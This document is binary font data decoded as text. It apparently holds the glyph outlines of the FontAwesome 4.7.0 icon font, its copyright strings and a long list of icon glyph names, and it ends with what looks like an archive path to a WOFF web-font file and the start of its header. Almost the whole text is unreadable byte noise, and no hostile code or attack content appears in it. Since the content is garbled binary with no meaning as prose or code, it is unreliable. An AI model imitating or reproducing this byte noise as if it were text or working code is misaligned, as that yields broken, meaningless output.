	.		��		.	�:� �� ��N�4LL44L`B^^B``B^^B`L�2632632#!"&5463�&&&&��&&&���&���&��&&�&�#27+"&5  %264&#"26546��>&�&T�,��X�������q&&�1��X��,�LΒw�%��%;#!"&5463!546;2!2!+"&52#!"/&4?63!5!�

�(��&&@&�&(��&�&@&&��(�

�(�

�&&@&&@��&&�&�&�

�����#''%#"'&54676%6%%�������
�hh �@�` ���!�� ���!� ��
��
��
�
������
�#52#"&5476!2#"&5476!2#"'&546
� 
��
� 
���
�
�@�
�
�@�
��
�@

�
� 84&"2$4&"2$4&"2#"'&'&7>7.54$ �KjKKj�KjKKj�KjKKj��d�ne���4"%!������KjKKjKKjKKjKKjKKjK.���٫�8
!%00C'Z���'���.W"&462"&462"&462 6?32$6&#"'#"&'5&6&>7>7&54>$ �KjKKj�KjKKj�KjKKj�h��я�W.�{+9E=�c��Q�d�FK��1A
0)����LlL��jKKjKKjKKjKKjKKjK���p�J2`[Q?l&�����٫�C58.H(Y���ee���	�

			���Y'����w��(�����O��'��R���@$#"&#"'>7676327676#"�
�����b,XHUmM�.�U_t,7A3ge
z9@xS���a�Q�BLb�(�	����V���U�����
!!!�=�����=���w)��������AU!!77'7'#'#274.#"#32!5'.>537#"76=4>5'.465!��KkkK_5 5�� �#BH1��`L

I���&�v6��SF���!Sr99rS!``� /7K%s}H���XV
��P��V	e��		V�d/9Q[ $547.546326%>>32"&5%632264&#"64'&""&'&"2>&2654&#";2���P���3>tSU<�)tqH+>XX|W��h,�:USt��W|XX>=X*
)���)
+�^X^�|WX=>X�:_.2������//a:Ru?�
	
Q%-W|XW>J�(	�=u��>XX|WX�`

*((*


+2		2�X>=XW|E��03>$32!>7'&'&7!6./EU����noh��i����I\�������0<{ >ORD��ƚ�~�˕V�ƻ��o�R C3��7J6I`��Tb<�^M~M8O����	�	
5!#!"&!5!!52!5463	^B�@B^���`B^�^B `��B^^"�����^B��B^��0;%'#".54>327&$#"32$	!"$&6$3 ##320�J�����U��n��L�n��ʡ���~~�&��q�@�t�K�����L��}�'`� -
-�ox����nǑUyl}��~������~�F����ڎ�LlL��t�`(88( ��	7!'	!���\W�������\���d;����tZ�`_��O��;���}54+";2%54+";2!4&"!4;234;2354;2354>3&546263232632#"&#"26354;2354;2354;2�````��p�p��`�`�`� !,! -&M<FI(2�`�`�`�����@PppP���pppppp�#  #
�
�pppp��p	�j#"'&=!;5463!2#!"&=#".'.#!#"&463232>7>;>32#"&'#"!546���	��%. `@��` :,.',-���Xj��jX�h-,'.,: kb>PppP>bk .%Z �&�
�:k%$> $`��`6&L')59I"Tl�ԖlT"I95)'L&69Gp�pG9$ >$%k:��!+32&#!332 $&6$ ~O8��8���O�����������LlL�>pN
�����
i������LlL����	'':Ma4&'#"'.7654.#""'&#"3!267#!"&54676$32#"'.76'&>$#"'.7654'&676mD5)
z�{��6lP,@Kij��jOo�Ɏ���ȕ>>��[t��a)GG4?a�)
ll
>�;_-/
9GH{�z�yN@,K�ԕoN��繁������y��!
?hh>$
�D��"
>��â?$��	n"&5462'#".54>22654.'&'.54>32#"#*.5./"�~��~�s�!��m�{b6#	-SjR,l'(s�-6^]It�g))[��zxȁZ&+6,4$.X%%Dc*
&D~WL}]I0"

YYZ��vJ@N*CVTR3/A3$#/;'"/fR-,&2-"
7Zr�^N��a94Rji3.I+

&6W6>N%&60;96@7F6I3���+4&#!"3!26%4&#!"3!26 $$ ��������^����a�a`@��@����^����a�a�����'7  $ >. %"&546;2#!"&546;2#/�a����^�����(�����������������^����a�a����(������N@��@�����4&#!"3!26 $$ @��@����^����a�a`@����^����a�a�����'  $ >. 7"&5463!2#/�a����^�����(��������n@����^����a�a����(������N@���%=%#!"'&7!>3!26=!26=!2%"&54&""&546 �#��#]V�TV$KjK�KjK$��&4&�Ԗ&4&�>��9G��!�5KK5��5KK5�!��&&j��j�&&����#/;Im2+#!"&'#"&463>'.3%4&"26%4&"26%6.326#>;463!232#.+#!"&5#"�5KK5sH.�.Hs5KK5e# )4# %�&4&&4&�&4&&4&` #4) #%�~]�e�Z�&�&�Z�e�]E-�&��&�-EKjK�j.<<.�KjK��)�#)�`"@�&&�`&&�&&�`&&�)#�`)"�d�Xo&&oX�G�,8&&8!����O##!!2#!+"'&7#+"'&7!"'&?63!!"'&?63!6;236;2!2�@�@�8��@7

8��Q�
	N�Q�
	N��
	8G@��

8GQ�
	N�Q�
	N7
	�������8��8��H��H��k��%		".>2I�������2�0�]@��]��@o�����o@@o�����o㔕����a�22���]����]�p�^���|11|�9�9�|11|�(��%7'7'	'	7T���� d���lt��l)q��n�������luul�������)1$4&"24&"2 &6 +"&5476;2 &6 LhLLh�LLhLLhL����>�
�� �&
  �&�`����>�hLLhLLhLLhL�����>����&�&�����>��G��
	.7)1!62	1!62h��e�������2�20e���2�2>�	v
+4�	[��d����+
���d� �135#5&'72!5!#"&'"'#"$547&54$ ���Eh���`X����(����cY���z�:L:�z���Yc��������\$_K`Pa}��f��iXXiޝf���a���	���(+.>#5#5!5!5!54&+'#"3!267!7!#!"&5463!2����U�`��`' ����� �����j��j�V>�(>VV>�>Vq����������������(^����(>VV>�>VV�=&'&'&'&76'&'&.' #.�h8��"$Y
''>eX5,	,Pts�K�25M�RLqS;:.K'�5�R

Ch���h�����R�t(+e�^TT���u B"$:2�~<�����2�Hp����wTT�� V�/7GWg. %&32?673327>/.'676$4&"2 $&6$   $6& $&6$ d-����-�m	
	,6*6,	
	m���KjKKj�o������oo���K����zz�8�zz�Ȏ������LlL�U4>>4-.��YG0
)�xx�)
0GYޞ.�jKKjKq���oo��oo�lz�����zz�8�0������LlL��D��/7H#"'.7'654&#"'67'.6?>%"&46227#".547|D,=),9#�7��[͑�f�x���!X: �D�$+�s)�hh�i��jZ������t�<��F/��*8C,�q؜�e���\�r,W�BX���/C2��h�hh���=�t������Xm�����>NZ+"&=46;2+"&=4>7>54&#"#"/.7632  >. $$ p��=+& �35,W48'3	l
z����ff���ff�����^����a�aP���2P: D#;$#
$*;?R
��Cf���ff�����^����a�a��'�Y	>O`"&5462&'.'.76.5632.'#&'.'&6?65��\\�[�<C��z�C
25�U#
.�ZK ��m+[$/#>(	|�	r���[A@[[@A�#2#�
����7�*
<Y���$
+}"(��
�q�87] F 	_��1)
��	�	#1Ke34&+326+"&=!#!"&763!2#!"&5463!2#>?4.'3#>?4.'3#>?4.'3��Xe`64[l�����7
��
,	L;�����=+3&98&+)>�>+3&98&+)>�=+3&88&+)>	�Wj�|r�>Q$��~���d$kaw+-wi[[\�;/xgY$kaw+-wi[[\�;/xgY$kaw+-wi[[\�;/xgY���J\m�4.'.'&#"#"'.'&47>7632327>7>54&'&#"327>"&47654'&462"'&476'&462"'&47>&'&462i$		$^"

%%

"^$		$W "@9O?1&&18?t@" W�&%%&4KK�6pp&4���6ZaaZ&4mttm�^x	-���-	x^=/U7Ck���kz'[$=�&5%54'4&K�K�4r<r4&��X��4[��[4&m����m��'/7?GOW_gow����"264$"264"264"264$"264"264$"264"264"&462"&462"&462"&462"&462"&462"&462"&462"&462"&462"&462"&462�^^�^��^^�^^�^^�^��^^�^��^^�^���^^�^��^^�^^�^^�^� p�pp�pp�pp��pp�pp�pp�pp��pp�pp�pp�pp��pp�pp�pp�pp��pp�pp�pp�pp��pp�pp�pp�pp�`^�^^�^^�^^�^^�^^��^^�^^�^^�^^�^^�^^�^^�^^�^^�^^���pp�pp�pp�p��pp�pp�pp�p��pp�p���pp�p��pp�p���pp�p��pp�pp�pp�p��pp�pp�pp�p	��LTi{�"&4626"&462$"&462#"&4632654>7>54 "&54>2"&462%"&54&#""&546 %#"&'&'.7>#"'&'.7>�&4&&4�&4&&4SZ��&4&&4�4$#&�&&j�3$"('$������&4&[���՛[��&4&&4F&4&�]\�&4&�$��
	!D�4�%	,\�4�4&&4&�4&&4&-�Z�4&&4&;cX/)#&>B)��&4&�j9aU0'.4a7����&&u՛[[���4&&4&@&&]��]&&��Ώ0
�u4��0
)�4���#g�&'.#"32676%4/&#"326'&#"2632#2+&'%#"'&6?676676632%#"'&6767#"&'&6767#"'.7>327"#"&'&6763"'.7>;7632;>%5K$
"0%>s$
"0%>;;>%5K�VL#>H30
\�($$(�\���(�є�yO2F/{�(?0(TK.5sg$��є�y#-F/{�$70(TK.5sg$L#>H30
\�($$(�\#�(@5"'K58!'"5�8!'"55"'K#dS$K		K$Sdx#@1
w�d>N;ET0((?
-
2K|��1
w�����d#N;ET0$(?
-
2K$#dS$K		K$Sdx�DN\2654& 265462"2654 #"32654>7>54."/&47&'?62 &4&���&4&���h�՛[&4&r$'("$3�j&&��&#$4[����"�@��GB�[�
"�&&��Β&&]���[��u&&����7a4.'0Ua9j�&4&�)B>&#)/Xc;u՛����"�"
�G�i[����Xh#"&54676324&'&#"'>54#"32#"54>54'.#"32>7>767632326#!"&5463!2b
)
:4FD�N

[�1�,^�J��K-*E#9gWR�Yvm0O	��w�@w��w�w��C2�2c@X�&!�9{M�A���_��"S4b// DR"Xlj�PY<	�@w��w�w��%���e4.#"32>7676#'.#"#"&54>3232>754&*#"&54>763 >32�
''il$E/
@�P@��
^��`��'W6&�!.. ! -P5+


�E{�n46vLe�Vz�:���,SN/
M5M[��
	]$�[��^��5�iC'2H&!(?]v`*	��l�	��b��$9>
���=R�2
#"&5467%!"&7>3-.7>;%.7>322326/.76/.'&6766/&/&#"&676	&676&6766/&672? �=1�(H/ ��	'96&�@)9<'���)29%
�&06#���#��$� J� �07j)�5@�"*3%�"!M
��%#K�"%N�e8)'8_�(9�.<�c +8 8(%6 <)'4@@)#-<^
?%$-`%.
}Q!&�}%&N�-l���IJ�;6>/�=*�%8!Q ���#P"�\Q#N&�a��)<9�bR]mp%"'.'&54>76%&54763263 #"/7#"'#"&/%$%322654&#"%'OV�9
�nt
|\d
ϓ[��nt
|@�D:)��	
;9�8'+|�j�," �41����CH^�nVz(�~R	�9�\'	�r�

@����L��@�
	@�w4�6�HI(+�C
,��55,��
f[op@�\j�;(zV~����i/5O#"'&54>32&#" 654'67'"'>54''&'"'6767&546767>7���蒓��`V BM���R� B9)̟�!SH-77I�Xm�SM�H*�k#".o;^J q�ן���ד��>@�����YM
$bK���d ��ү[E"����;���Kx%^�6;%T,U:i�m=Mk���).DT4'"&5463267&#" 6;64'.'4'>732676%#!"&5463!2),�蛜s5-<A���4ϲ
2W9
�&P:\�3)SEPJ��D4:3NI�w�@w��w�w��NE	2@u��us�+,�����/?x�sa�tmP�'�)fHVEA(%dA4w&4J5*�@w��w�w�����O[4'.'&54>54&#"#"'654'.#"#"&#"3263232>3232>76 $$ �Cf'/'%($�U�L
(
#'/'@��3#@,G)+H+@#3
����^����a�a�X@_O#NW�#O_�.*	##(��^����a�a����q�[632632#"&#"#".'&#"#".'&54767>7654.54632327&547>P��9	B6?K?%�O4�T% >6>Z64Y=6>%S�4N�$?L?4B	@���{:y/�$ ,'R�!F!8%
#)(()#%:!F �Q'+%�0z:�z���O_4'.'&54>54&#"#"'654'.#"#"&#"3263232>3232>76#!"&5463!2Cf'.'%($�V�M
)
#'.'@��
3
#A,G)+H+A#
4
��w�@w��w�w��XA?4N$NW�&M&L�/*
##	+�@w��w�w����	O$>?>762'&#"./454327327>7>	EpB5
3FAP/h����\�/NG�S�L�	� ���R�P*��m�95F84f&3Ga4B|wB.\FI*/�.?&,��5~K %
&��Y."7n<	"-I.�M`{�ARwJ!�FX^dj''''"'7&'7&'7&'7&547'67'67'67'63277774$#"32$			*��'ֱ,?�g=OO&L&NJBg�;1��'����'ֱ.=�gCIM
$'&&NJBg�=.��%�����w؝\\��w�
�I�o�o��<�<���-NIDg�=/��%����(ײ+A�hEHO*"#*OICh�=/��'����(ֲ/=�h>ON.��]��xwڝ]��������7��e��[���@�����)6!!"3#"&546%3567654'3!67!4&'7S��gn�y]K-�����#75LSl>�9���V��%�cPe}&H�n��_�HȌ����=UoLQ1!��4564���7U�C"�
�!-9[nx��"&46254&"326754&"326754&"26754&"26#".547632632626326'4#"#"54732764&"264.#"327632>#"'"'#"'#"&5#"'67&'327&'&54>3267>7>7>32632632T"8""8�)<())�(<)))�)<))<)�)<))<)T�د{ՐRh�x=8 78 n 81
p��H_6�S��oc
�F@b@?d?uK�bM�70[f5Y$35KUC<:��[;+8 n 87 8/8Zlv]64qE 'YK�0-AlB;
W��#;WS9
&�(#-7Z�://:/�Tr++r,,r++r,,r++r,,r++r,,ʠ�g��xXV�ע��e9222222^�K�Vv���F0�2OO23OO��`�lF;�mhj84D�ro��B@�r+@222222C0DP`.�r8h9��~T4.&o�@9��1P���%14'!3#"&46327&#"326%35#5##33 $$ ����}Pc��c]<hl���ࠥ�Ymmnnnn���^����a�aw!�LY�Ə;ed����wnnnnnv�^����a�a��%�'#"$#"#.5462632327>321��I��U�Π?L���L?��cc�4MX�&��04;0��XpD[��[DpD,)&&�Q	9V\�26&".'&'&6?.#"#26327677>'32>&3#'&+"?626&"#!'.'!"&5463!>;26;2!2�P  P 	
92#.}S�P9:�:%L\B�� )spN/9oJ5 
!+D�`]�Bg�Y9�+�,�9%
Pk4P  P &�NnF!_7*}B<�{o0��&&�B;*<@$ucRRc�#@16#37c&�@@@
J"@*4�^`E�D�B�����o/8927
*@O�LC�!T!32�3X$�BJ@@@��&AS
0C59"'D/&�&D488$5A&�%O#!"&547>7>2$7>/.".'&'&2>^B�@B^>FFz�n_0P:P2\n�zFF>��R&�p^1P:P1^��&R
P2NMJMQ0Rr�.B^^B�	7:5]yPH!%%"FPy]5:7	���=4�QH!%%!H�t4=�<"-/ ?�1Pp+".'.'.?>;2>7$76&'&%.+"3!26#!"&54767>;2�'
+�~'*OJ%%JN,&x�'%^�M,EE,M7�ZE[��P*FF*P��:5
�
�^B�@B^){�$.MK%%KM.$+��X)o3"�a  22!]�4	I�>"">�,�&�S8J�B##B��12�`
��`B^^B�8&ra#11#$��R&��"&.2v%/%''%/%7%7'%7'/#&5'&&?&'&?&'&7%27674?6J�"�����0�<=���_gNU�?D��f���u�Y����G�b���7=^H^�`	�=v~yT������3����G���D��P�O	4F��ѭ����q������i_w\ހ�!1u�S���%V_-d�
���1=U{J8n~�r����'U4.#".'"3!264&"26+#!"&5463!232+32+32�0P373/./373P0T=@=T��֙�֙|`^B�@B^^B�B^`````*9deG-!

!-Ged9Iaa�l��lk���O��B^^B�B^^B�������	+Yi"&54622#!"&54>;2>+32+32+#!"&5463!2324&#!"3!26�֙�֙0.I/ OB��BO	-Q52-)&)-2�
``

``

`^B�@B^^B�B^`
�
�@

�
|k��kl����"=IYL)CggC0[jM4				
�
�
�
�
�B^^B�B^^B�
�@�

�@
���!1AQu4.#".'"3!24&"254&#!"3!2654&#!"3!2654&#!"3!26#!54&+"!54&+"!"&5463!2)P90,***,09P)J66S�����"��@��8��@^B��@�@��B^^B�B^U�kc9		9ck�U?�������@@88@@N�@B^````^B�B^^���!1AQu�#!"&4>32>72"&462#!"&=463!25#!"&=463!25#!"&=463!24&#!"3!546;2!546;2!26#!"&5463!2J6�6J)P90,***,09P)������"��@��8��@�
�@

`@@`
�^B�@B^^B�B^ՀUU�kc9		9c�������`@@�88�@@�2�

�@
````�@B^^B�B^^�(%.'"&' $&  #"$&6$ ��wC�ιCw�jJ~J�����>��������LlL�ś�JSSJ͛����>����6������LlL���$,  $&6654&$ 3 72&&  �lL������m�z�����z�B�l������>�������KlL�G���zz���G���>�����'7#!"&54>7&54>2  62654' '3�/U]B,ȍ����,B]U/OQ��н�Q������>�+X}��������}X�0b�Ӄ��ۚ�Ӆb0}�h��QQ��h�����>��f����f��#=#!"&4>3272"&462!3!26#!"&5463!;26=!2J6�6J)Q8P�P8Q)��������
�
�^B�@B^^B`�`B^V�VV�ld9KK9d��������`��
�@B^^B�B^``^���+;K[eu4.#"'"3!264&"254&#!"3!2654&#!"3!26%54&+";2654&#!"3!26!54&#!"!#!"&5463!2�"D/@�@/D"?,�,?�p�pp�p�@�����@����@����@�^B�@B^^B�B^D6]W2@@2W]67MM��pp�p��@@@@@@@@n`�@B^^B�B^^���+;K[eu#!"&54>3272"&462#!"&=463!2%#!"&=463!2+"&=46;25#!"&=463!2!3!26#!"&5463!2�?,�V,?"D/@�@/D"�p�pp�p�@�����@����@���
�
�^B�@B^^B�B^D7MM76]W2@@2W]֠pp�p��@@�@@@@�@@��`��
�@B^^B�B^^��A#"327.#"'63263#".'#"$&546$32326�������J9"65I).!1i���CC�u
+I�\Gw\B!al���݇���y�ǙV��/]:=B�>9�����+<F+a[le���Pn[A&JR7t�)��+�tH�������kFIK�e	� .��#"'&'>32%#!"&5463!2#"&54>54'&#"#"54654'.#"#"'.54>54'&'&543232654&432#"&54>764&'&'.54632� ?c��'p& ?b1w{2V	?#��&#9&�CY'&.&#+B

: &65&*2w�1GF1)2<)<'

(
BH=ӊ:NT :O	�)4:i F~b`e!}�U3i?fR����UX|'&'&I�c&Q
	*2U.L6*/
L:90%>..>%b>++�z7ymlw45)0	33J@0!!TFL����� P]=GS�-��kwm	!����*�(%6&692? $&6$ ��	' ����al�@l�������LlL���,&��EC
���h�$�������LlL���
/37;%"&546734&'4&" 67 54746 #5#5#5�p�pF:�:F�D<p�p<D�
����������
���������PppP<d��ud<M�-PppP�-�M����������Dž����9���������
/37;%"&546734&'4&" 67 54746 #5#5#5�p�pF:�:F�D<p�p<D�
����������
���������PppP<d��ud<M�-PppP�-�M����������Dž����9���������
/37;%"&546734&'4&" 67 54746 #5#5#5�p�pF:�:F�D<p�p<D�
����������
���������PppP<d��ud<M�-PppP�-�M����������Dž����9���������
/37;%"&5467534&'4&" 67 54746 #5#5#5�p�pF:�:F�D<p�p<D�
����������
���������PppP<d��d<M�-PppP�-�M����������Dž����9���������	+/37%"&54624&'4&" 67 54746 #5#5#5�p�pp�p�D<p�p<D�
����������
���������PppPOqqOM�-PppP�-�M����������Dž����9����������&.6>FNV^fnv~����"/&4?.7&#"!4>3267622"&4"&46262"&42"&4462"$2"&42"&4"&46262"&4"&46262"&42"&4$2"&42"&42"&4�

��

R

,H8Jfj��Q��hj�G^�R,

!4&&4&Z4&&4&�4&&4&��4&&4&&4&&44&&4&��4&&4&Z4&&4&�4&&4&��4&&4&�4&&4&��4&&4&&4&&4&Z4&&4&Z4&&4&

��

R

,[�cG�j�h��QRJ'A,

��&4&&4Z&4&&4Z&4&&4Z&4&&444&&4&�&4&&4Z&4&&4Z&4&&4Z&4&&4�&4&&4Z&4&&4Z&4&&4&&4&&4Z&4&&4Z&4&&4�%-5=EM}���������+"&=#!"'+"&=&="&4626"&462&"&462"&462&"&462&"&462#!"&=46;4632676/&?.7&#"!2"&462&"&462&"&462"&462&"&462&"&462"&462&"&462"&462��@?A�A?
@
�@R.�..R�@`�jlL.h)*��*$	%35K���..�..�.����u�vn�u���....��@@�j�N *��*.t2#K5���..R..R.��
@Hq '&'&54 &7676767654$'.766$76"&462&'&'&7>54.'.7>76�����������ȵ|�_ğ��yv���/ۃ�⃺����k]
:Bu�q��
CA
_k�ނ���XVo�bZZb�nW��|V	0 	Q2��-�
l��}���O		/	:�1���z	
q��%������z�G
4(

6�Ro�aą\�<

)4	J�}�������%!!#!"&5463!2�^B�@B^^B�B^�`�@B^^B�B^^���%#!"&=463!2^B�@B^^B�B^�B^^B�B^^�&))!32#!#!"&5463!463!2��`B^^B��^B�@B^^B`^B�B^�^B�@B^��B^^B�B^`B^^���#3%764/764/&"'&"2?2#!"&5463!2��

��

�

��

�

��

�

��
s^B�@B^^B�B^ג

��

�

��

�

��

�

��
�@B^^B�B^^���#'7"/"/&4?'&4?62762!!%#!"&5463!2�

��

�

��

�

��

�

��
�
�^B�@B^^B�B^��

��

�

��

�

��

�

��
��`�@B^^B�B^^�	! $&6$ .2�r��`�������LlL�f4��������LlL���#.C��&>"'&4762"/&4?62'"'&4762%'.>6.'.>6'>/>76&'&.'&7&'">?4'.677>7.>37654'&'67>776 $&6$ (4�Z�##
&##
&y�"�6&.JM@&� "(XE*$+8
jT<l$3-V<
2'.


-1
%#e"!Z�
+*)H	 8
(j

	#*
-ƷVv/kh?'��������MlM�$($�R#

&
"
#'#vZ@+&MbV$
�
G7
--)

R2T�
313dJ6@8lr2_�5m/."�G:=	)%5f0gt*2)?;CB66&, �	`48]USy������LlL���G6?>?3#'.'&!3!2>?3.'#!57>7'./5!27#'.#!"g�%%D-!gg<6W��WZe#1=/2*]Y3��-,����C1/Dx���] VF��I�q-H�����D2��NK'>*�%�R=f
07���=.
fD�]\|yu���,0>Seu#2#"'&5<>323#3#&'#334'."#"+236'&54.#"5#37326#!"&5463!2�		<	��zz�j��k-L+� )[$�8=".un/2 �^B�@B^^B�B^�5cy	
�
��(�ݔI�(8��?C�(3�>�� #"��($=�@B^^B�B^^0�K�S�&'.'&'./674&$#">&>?>'76'# "&#./.'7676767>76$w
.~ku�BR�]� T%z+",�|�ޟ���j<���)(!(	~ˣzF8"{���%%#5����)��}''�x��JF��0"H[$%��EJ#%
.Gk29(B13"?�@S)�5" �#9����dm�W"��;L�65R�A0@T.���$�}i`:f3A%%
BM<$q�:)BD	aa%`�]A&c|	�M��s!
Z
2}i[F&���**
< ��ʣsc"J<&Ns�F%���0@Wm6&'.6$.7>7$76".4>2.,&>6'"'&7>=GV:�e#:$?+%

q4����g
&3h�T`Zt�Q��м�QQ��м�pA������P1L������K!:<��}҈`d��l��b�,�9'


%%($!
���a3���)W)x
�������
о�QQ��о�QQ���cQ����ǡ-�җe)U�s2����XD\���ϼ�Yd����/?O_o���#"=#"=4;543#"=#"=4;543#"=#"=4;543#"=#"=4;543#"=#"=4;543%#!"&5463!2++532325++532325++532325++532325++53232�p00pp00pp00pp00pp00�8(��(88(@(80pp00pp00pp00pp00pp0� � � � � ��@(88(�(88� �� �� �� �� �/�Q�/&'%&/"&=.6?&?&'&6?'.>-#".6?'.>'&6'.>54627>%>76#"'%
%6��

2�7
2G
f���!)p&4&p)!��f
G2
7�2

��	*6���	"��
4�7
2G
f�!)p&4&p)!�f
G2
7�2

��"	���6*	�!k
3

j�&3
%,����*��&&ր*�9���%
3&�j

3
k!./!>��>$,*!k
3.j�&3
%�Ԝ9�*��&&ր*�ǜ,%
3&�j

3
k!*,$>��>!/.�&6.'&$	&76$76$�P��utۥiP��u��G��xy
��Զ�[xy
�-���_v١eN��uv١e	��=��u�ʦ�����[t7��8�X�
&6##'7-'%'&$  $6 $&6$ ��3��1�N��E0�����g��R�=|�����||�">"��������LlL����^��v!1f2i��Ђwg�fZQ�Q^>"�||�����||�w������LlL��&�Z�Xblw��������.'&>'&'&".'.'&&'&'&7>767>67>7626&'&>&'&>'.7>.676'&'&'&'.67.>7>6&'&676&'&676.676&'&>&'&676'.>6/4-LJg-$	6)j2%+QF)�b3FSP21DK2�AW")")�$??8A&A�E5lZm��=g�G2Sw*&>$5jD ���GH�yX/4F �r	1
	1�"�"!�l=6>��	6
,5./��'e



.*�|�Ed!
u&�&%&��	&��5d	
���))66@�C&8B@q��L?P^7	G-hI[q��:<�rS	U~97A_�IR`gp1	1	�;"("j?>"�T�6
,6 
&/`���LwQ'�	
��A	^	�	�	"�		$&	_	��	y		�	*�	<Copyright Dave Gandy 2016. All rights reserved.Copyright Dave Gandy 2016. All rights reserved.FontAwesomeFontAwesomeRegularRegularFONTLAB:OTFEXPORTFONTLAB:OTFEXPORTFontAwesomeFontAwesomeVersion 4.7.0 2016Version 4.7.0 2016FontAwesomeFontAwesomePlease refer to the Copyright section for the font trademark attribution notices.Please refer to the Copyright section for the font trademark attribution notices.Fort AwesomeFort AwesomeDave GandyDave Gandyhttp://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/license/����������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ab�
cdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������"	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRS�TUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������������������������������glassmusicsearchenvelopeheartstar
star_emptyuserfilmth_largethth_listokremovezoom_inzoom_outoffsignalcogtrashhomefile_alttimeroaddownload_altdownloaduploadinboxplay_circlerepeatrefreshlist_altlockflag
headphones
volume_offvolume_down	volume_upqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalictext_height
text_width
align_leftalign_centeralign_right
align_justifylistindent_leftindent_rightfacetime_videopicturepencil
map_markeradjusttinteditsharecheckmove
step_backward
fast_backwardbackwardplaypausestopforwardfast_forwardstep_forwardejectchevron_left
chevron_right	plus_sign
minus_signremove_signok_sign
question_sign	info_sign
screenshot
remove_circle	ok_circle
ban_circle
arrow_leftarrow_rightarrow_up
arrow_down	share_altresize_fullresize_smallexclamation_signgiftleaffireeye_open	eye_closewarning_signplanecalendarrandomcommentmagnet
chevron_upchevron_downretweet
shopping_cartfolder_closefolder_openresize_verticalresize_horizontal	bar_charttwitter_sign
facebook_signcamera_retrokeycogscomments
thumbs_up_altthumbs_down_alt	star_halfheart_emptysignout
linkedin_signpushpin
external_linksignintrophygithub_sign
upload_altlemonphonecheck_emptybookmark_empty
phone_signtwitterfacebookgithubunlockcredit_cardrsshddbullhornbellcertificate
hand_right	hand_lefthand_up	hand_downcircle_arrow_leftcircle_arrow_rightcircle_arrow_upcircle_arrow_downglobewrenchtasksfilter	briefcase
fullscreengrouplinkcloudbeakercutcopy
paper_clipsave
sign_blankreorderulol
strikethrough	underlinetablemagictruck	pinterestpinterest_signgoogle_plus_signgoogle_plusmoney
caret_downcaret_up
caret_leftcaret_rightcolumnssort	sort_downsort_upenvelope_altlinkedinundolegal	dashboardcomment_altcomments_altboltsitemapumbrellapaste
light_bulbexchangecloud_downloadcloud_uploaduser_mdstethoscopesuitcasebell_altcoffeefood
file_text_altbuildinghospital	ambulancemedkitfighter_jetbeerh_signf0fedouble_angle_leftdouble_angle_rightdouble_angle_updouble_angle_down
angle_leftangle_rightangle_up
angle_downdesktoplaptoptabletmobile_phonecircle_blank
quote_leftquote_rightspinnercirclereply
github_altfolder_close_altfolder_open_alt
expand_altcollapse_altsmilefrownmehgamepadkeyboardflag_altflag_checkeredterminalcode	reply_allstar_half_emptylocation_arrowcrop	code_forkunlink_279exclamationsuperscript	subscript_283puzzle_piece
microphonemicrophone_offshieldcalendar_emptyfire_extinguisherrocketmaxcdnchevron_sign_leftchevron_sign_rightchevron_sign_upchevron_sign_downhtml5css3anchor
unlock_altbullseyeellipsis_horizontalellipsis_vertical_303	play_signticketminus_sign_altcheck_minuslevel_up
level_down
check_sign	edit_sign_312
share_signcompasscollapsecollapse_top_317eurgbpusdinrjpyrubkrwbtcfile	file_textsort_by_alphabet_329sort_by_attributessort_by_attributes_alt
sort_by_ordersort_by_order_alt_334_335youtube_signyoutubexing	xing_signyoutube_playdropbox
stackexchange	instagramflickradnf171bitbucket_signtumblrtumblr_signlong_arrow_down
long_arrow_uplong_arrow_leftlong_arrow_rightwindowsandroidlinuxdribbleskype
foursquaretrellofemalemalegittipsun_366archivebugvkweiborenren_372stack_exchange_374arrow_circle_alt_left_376dot_circle_alt_378vimeo_square_380
plus_square_o_382_383_384_385_386_387_388_389uniF1A0f1a1_392_393f1a4_395_396_397_398_399_400f1ab_402_403_404uniF1B1_406_407_408_409_410_411_412_413_414_415_416_417_418_419uniF1C0uniF1C1_422_423_424_425_426_427_428_429_430_431_432_433_434uniF1D0uniF1D1uniF1D2_438_439uniF1D5uniF1D6uniF1D7_443_444_445_446_447_448_449uniF1E0_451_452_453_454_455_456_457_458_459_460_461_462_463_464uniF1F0_466_467f1f3_469_470_471_472_473_474_475_476f1fc_478_479_480_481_482_483_484_485_486_487_488_489_490_491_492_493_494f210_496f212_498_499_500_501_502_503_504_505_506_507_508_509venus_511_512_513_514_515_516_517_518_519_520_521_522_523_524_525_526_527_528_529_530_531_532_533_534_535_536_537_538_539_540_541_542_543_544_545_546_547_548_549_550_551_552_553_554_555_556_557_558_559_560_561_562_563_564_565_566_567_568_569f260f261_572f263_574_575_576_577_578_579_580_581_582_583_584_585_586_587_588_589_590_591_592_593_594_595_596_597_598f27euniF280uniF281_602_603_604uniF285uniF286_607_608_609_610_611_612_613_614_615_616_617_618_619_620_621_622_623_624_625_626_627_628_629uniF2A0uniF2A1uniF2A2uniF2A3uniF2A4uniF2A5uniF2A6uniF2A7uniF2A8uniF2A9uniF2AAuniF2ABuniF2ACuniF2ADuniF2AEuniF2B0uniF2B1uniF2B2uniF2B3uniF2B4uniF2B5uniF2B6uniF2B7uniF2B8uniF2B9uniF2BAuniF2BBuniF2BCuniF2BDuniF2BEuniF2C0uniF2C1uniF2C2uniF2C3uniF2C4uniF2C5uniF2C6uniF2C7uniF2C8uniF2C9uniF2CAuniF2CBuniF2CCuniF2CDuniF2CEuniF2D0uniF2D1uniF2D2uniF2D3uniF2D4uniF2D5uniF2D6uniF2D7uniF2D8uniF2D9uniF2DAuniF2DBuniF2DCuniF2DDuniF2DEuniF2E0uniF2E1uniF2E2uniF2E3uniF2E4uniF2E5uniF2E6uniF2E7_698uniF2E9uniF2EAuniF2EBuniF2ECuniF2EDuniF2EE����=���O<0�1h�PKԜ�\3{��~�~<purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.woffnu&1i�wOFF~�
��FFTM0k�G�GDEFL �OS/2l>`�2z@cmap�i�
�:gasp��glyf _yL����Mheadb�36��-hheab�$
�hmtxb��
